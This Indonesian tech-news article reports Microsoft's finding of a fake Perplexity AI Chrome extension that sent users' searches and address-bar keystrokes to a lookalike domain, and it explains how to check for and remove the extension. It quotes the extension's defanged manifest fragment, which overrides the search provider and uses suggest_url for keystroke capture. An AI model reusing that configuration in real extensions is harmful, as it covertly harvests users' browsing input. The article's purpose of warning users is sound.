Jika selama ini Anda merasa memasang ekstensi dari Chrome Web Store sudah pasti aman, mungkin sudah saatnya mulai berpikir dua kali. Pasalnya, Google kembali kecolongan setelah sebuah ekstensi tiruan yang mengatasnamakan Perplexity AI sukses lolos ke Chrome Web Store dan rupanya berisi malware yang diam-diam mencuri kegiatan pengguna.
Dan yang lebih mengkhawatirkannya, ekstensi tersebut sempat tersedia untuk didownload sebelum akhirnya dihapus oleh Google.
Bukan Perplexity AI Asli
Satu perihal yang pasti, berasas laporan dari Microsoft Defender Security Research Team, ekstensi rawan tersebut menggunakan nama “Search for perplexity ai” agar terlihat seperti aplikasi resmi dari Perplexity AI.
Namun setelah diinstal, ekstensi ini rupanya tidak terhubung ke jasa resmi Perplexity, melainkan mengarahkan seluruh kegiatan pencarian pengguna ke domain tiruan perplexity-ai[.]online, bukan ke perplexity.ai yang asli.

Dan tentu, seluruh pencarian yang dilakukan oleh pengguna, bisa direkam oleh server milik pelaku.
Bahkan Ketikan Sebelum Enter Pun Ikut Direkam
Yang bikin kasus ini makin mengkhawatirkan adalah keahlian malware tersebut, dimana menurut Microsoft, ekstensi ini tidak hanya mencatat hasil pencarian setelah pengguna menekan tombol Enter, tetapi juga bisa merekam setiap karakter yang diketik secara real-time melalui fitur suggest_url.
Dengan kata lain, setiap kata yang diketik di address bar Chrome dapat dikirim terlebih dulu ke server milik pelaku sebelum pengguna betul-betul melakukan pencarian.
"chrome_settings_overrides": {"search_provider": {
"name": "Perplexity Search",
"keyword": "perplexity",
"is_default": true,
"search_url": "hxxps://perplexity-ai[.]online/search/{searchTerms}",
"favicon_url": "hxxps://perplexity-ai[.]online/favicon.ico",
"suggest_url": "hxxps://perplexity-ai[.]online/search?output=firefox&q={searchTerms}"
}
}
Sekarang Sudah Dihapus, Tapi…
Nah berita baiknya, Google sekarang sudah menghapus ekstensi tersebut dari Chrome Web Store. Namun masalahnya, menghapus dari Chrome Web Store tidak otomatis menghapusnya dari komputer pengguna.
Artinya nih guys, siapapun yang sempat menginstalnya tetap tetap berisiko hingga menghapus ekstensi tersebut secara manual, jadi pastikan Anda sudah menghapus ekstensi yang mencurigakan di browser kamu.
Caranya, buka laman chrome://extension > pastikan bahwa tidak ada ekstensi dengan ID flkebkiofojicogddingbdmcmkpbplcd terinstall di perangkat kamu.

Nah secara umum, kasus seperti ini sebenarnya bukan yang pertama. Dalam beberapa tahun terakhir, Chrome Web Store berulang kali ditemukan menjadi tempat lolosnya beragam ekstensi berbahaya, mulai dari pencuri cookie, pencuri password, hingga malware yang memata-matai kegiatan browsing pengguna.
Oleh lantaran itu, meskipun Chrome Web Store merupakan toko resmi Google, bukan berfaedah seluruh ekstensi yang tersedia di sana dapat dipercaya begitu saja sehingga kita sebagai pengguna kudu lebih aware dan berhati hati bakal ekstensi yang kita install dan pakai.
Nah gimana menurutmu mengenai temuan ini? komen dibawah guys
Via : Microsoft
Catatan Penulis : WinPoin sepenuhnya berjuntai pada iklan untuk tetap hidup dan menyajikan konten teknologi berbobot secara cuma-cuma — jadi jika Anda menikmati tulisan dan pedoman di situs ini, minta whitelist laman ini di AdBlock Anda sebagai corak support agar kami bisa terus berkembang dan berbagi insight untuk pengguna Indonesia. Kamu juga bisa mendukung kami secara langsung melalui support di Saweria. Terima kasih.
Written by
Gylang Satria
Tech writer yang sehari‑hari berkutat dengan Windows 11, Linux Ubuntu, dan Samsung S24. Punya pertanyaan alias butuh diskusi? Tag @gylang_satria di Disqus. Untuk kolaborasi, email saja ke [email protected]
Post navigation
Previous Post
English (US) ·
Indonesian (ID) ·